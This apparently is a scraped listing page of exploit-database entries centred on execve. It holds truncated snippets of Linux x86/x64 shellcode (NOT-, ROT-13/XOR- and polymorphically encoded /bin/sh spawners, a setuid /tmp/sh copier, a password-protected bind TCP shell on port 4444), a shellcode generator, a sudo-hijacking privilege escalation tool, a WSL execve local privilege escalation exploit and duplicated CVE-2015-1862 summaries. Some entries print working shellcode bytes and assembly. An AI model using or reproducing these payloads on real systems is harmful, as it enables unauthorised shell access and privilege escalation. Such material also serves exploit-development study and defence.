Linux/x86 - execve(/bin/sh) + NOT Encoded Shellcode (27 bytes)

Linux/x86 - execve/bin/sh + NOT Encoded Shellcode 27 bytes. Shellcode exploit for Linuxx86 platform / ; Title : Execve /bin/sh Shellcode encoded with NOT ; Date : May, 2018 ; Author : Nuno Freitas ; Twitter : @nunof11 ; SLAE ID : SLAE-1112 ; Size : 27 bytes ; Tested on : i686 GNU/Linux section...

Linux/x86 execve /bin/sh Encoded Shellcode (44 bytes)

/ ; Title : Execve /bin/sh Shellcode encoded with ROT-13 + RShift-2 + XOR ; Date : April, 2018 ; Author : Nuno Freitas ; Blog Post : https://bufferoverflowed.wordpress.com/slae32/slae-32-shellcode-encoder/ ; Twitter : @nunof11 ; SLAE ID : SLAE-1112 ; Size : 44 bytes ; Tested on : i686 GNU/Linux...

Linux/x86 - execve(cp /bin/sh /tmp/sh; chmod +s /tmp/sh) + Null-Free Shellcode (74 bytes)

Linux/x86 - execvecp /bin/sh /tmp/sh; chmod +s /tmp/sh + Null-Free Shellcode 74 bytes. Shellcode exploit for Linuxx86 platform / Title: Linux/x86 - cp /bin/sh /tmp/sh; chmod +s /tmp/sh Author: absolomb Website: https://www.sploitspren.com SLAE-ID: 1208 Purpose: cp shell into /tmp and setuid Teste...

Linux/x86 - execve(/bin/sh) + ROT-13 + RShift-2 + XOR Encoded Shellcode (44 bytes)

Linux/x86 - execve/bin/sh + ROT-13 + RShift-2 + XOR Encoded Shellcode 44 bytes. Shellcode exploit for Linuxx86 platform / ; Title : Execve /bin/sh Shellcode encoded with ROT-13 + RShift-2 + XOR ; Date : April, 2018 ; Author : Nuno Freitas ; Blog Post :...

Linux/x64 - x64 Assembly Shellcode (Generator)

Linux/x64 - x64 Assembly Shellcode Generator. Shellcode exploit for Generator platform !/usr/bin/env python Features: - Linux shellcode x64 assembly code generation - stack based smaller payload size - execve based - supports long commands meaning bigger than an x64 register - 64 bits - supports...

Linux/x64 - x64 Assembly Shellcode (Generator)

!/usr/bin/env python Features: - Linux shellcode x64 assembly code generation - stack based smaller payload size - execve based - supports long commands meaning bigger than an x64 register - 64 bits - supports long parameters meaning bigger than an x64 register - 64 bits - one command only execve...

Linux/x86 execve /bin/sh Shellcode (18 bytes)

/ Linux/x86 - execve /bin/sh shellcode 18 bytes Author: Anurag Srivastava Tested on: i686 GNU/Linux Shellcode Length: 18 Disassembly of section .text: 08048060 : 8048060: 6a 0b push 0xb 8048062: 58 pop eax 8048063: 53 push ebx 8048064: 68 2f 2f 73 68 push 0x68732f2f 8048069: 68 2f 62 69 6e push...

Sudohulk - Try Privilege Escalation Changing Sudo Command

This tool change sudo command, hooking the execve syscall using ptrace, tested under bash and zsh supported architectures: x8664 x86 arm How use: $ make cc -Wall -Wextra -O2 -c -o bin/shremotedata.o src/shremotedata.c cc -Wall -Wextra -O2 -c -o bin/shstring.o src/shstring.c cc -Wall -Wextra -O2 -...

CVE-2015-1862

The crash reporting feature in Abrt allows local users to gain privileges by leveraging an execve by root after a chroot into a user-specified directory in a namedspaced environment...

Security feature bypass

The crash reporting feature in Abrt allows local users to gain privileges by leveraging an execve by root after a chroot into a user-specified directory in a namedspaced environment...

CVE-2015-1862

The crash reporting feature in Abrt allows local users to gain privileges by leveraging an execve by root after a chroot into a user-specified directory in a namedspaced environment...

CVE-2015-1862

CVE-2015-1862 describes a local privilege-escalation in ABRT’s crash reporting. The vulnerability arises when ABRT’s crash-handler code performs an execve after a chroot into a user-specified directory within a named-space; a race condition/symlink handling flaw can allow a local user to influenc...

Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (136 bytes)

global start start: ; sock = socketAFINET, SOCKSTREAM, 0 ; AFINET = 2 ; SOCKSTREAM = 1 ; syscall number 41 push 41 pop rax push 2 pop rdi push 1 pop rsi cdq syscall ; copy socket descriptor to rdi for future use xchg rdi,rax ; server.sinfamily = AFINET ; server.sinport = htonsPORT ;...

Microsoft Windows Subsystem for Linux - execve() Local Privilege Escalation

Microsoft Windows Subsystem for Linux - execve Local Privilege Escalation define GNUSOURCE include include include include include include include include include include include include include include include define RINGSIZE 0x2000000 define PIPESIZE 0xb8 define PTRSIZE 0x8 define STRHDRSIZE 0x...

Linux/x64 - Twofish Encoded + DNS (CNAME) Password + execve(/bin/sh) Shellcode

Linux/x64 - Twofish Encoded + DNS CNAME Password + execve/bin/sh Shellcode. Shellcode exploit for Linuxx86-64 platform /----- Crypter.c ----- / / Optimized Twofish C implementation by Drew Csillag: https://www.schneier.com/code/twofish-cpy.zip Partially re-written by Andre Lima...

Microsoft Windows Subsystem for Linux - 'execve()' Local Privilege Escalation

define GNUSOURCE include include include include include include include include include include include include include include include define RINGSIZE 0x2000000 define PIPESIZE 0xb8 define PTRSIZE 0x8 define STRHDRSIZE 0x18 define LEAKOFFSET 0x68 define SHELLCODEOFFSET 0x200 define...

Linux/x86 ROT-N + Shift-N + XOR-N Encoded /bin/sh Shellcode (77 bytes)

/ Description ; Title : ROT-N + Shift-N + XOR-N encoded /bin/sh - Shellcode ; Author : Hashim Jawad ; Blog Post : https://ihack4falafel.com/2018/01/rot-n-shift-n-xor-n-shellcode-encoder-linux-x86/ ; Twitter : @ihack4falafel ; SLAE ID : SLAE-1115 ; Purpose : spawn /bin/sh shell ; Tested On : Ubunt...

Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (26 bytes)

/ Description ; Title : Polymorphic execve /bin/sh - Shellcode ; Author : Hashim Jawad ; Website : ihack4falafel.com ; Twitter : @ihack4falafel ; SLAE ID : SLAE-1115 ; Purpose : spawn /bin/sh shell ; OS : Linux ; Arch : x86 ; Size : 26 bytes sh.nasm global start section .text start: ; zero out EA...

Linux/x86 - execve(/bin/sh,0,0) Shellcode (21 bytes)

/ linux/x86 execve"/bin/sh",0,0 21 bytes http://www.gonullyourself.org sToRm / char shellcode = // "\x31\xc9" // xor %ecx,%ecx "\xf7\xe1" // mul %ecx "\x51" // push %ecx "\x68\x2f\x2f\x73\x68" // push $0x68732f2f "\x68\x2f\x62\x69\x6e" // push $0x6e69622f "\x89\xe3" // mov %esp,%ebx "\xb0\x0b" //...

Linux/x86 - Audio (knock knock knock) via /dev/dsp + setreuid(0,0) + execve() Shellcode (566 bytes)

/ Audio knock knock knock via /dev/dsp + setreuid0,0 + execve shellcode. Linux x86 Author: Cody Tubbs loophole of hhp. www.hhp-programming.net / email protected 12/20/2000. F.U. to ph1xry4n. -From me and dxmd... If I ripped this, show me the source... or better yet go barrow a shovel so you can d...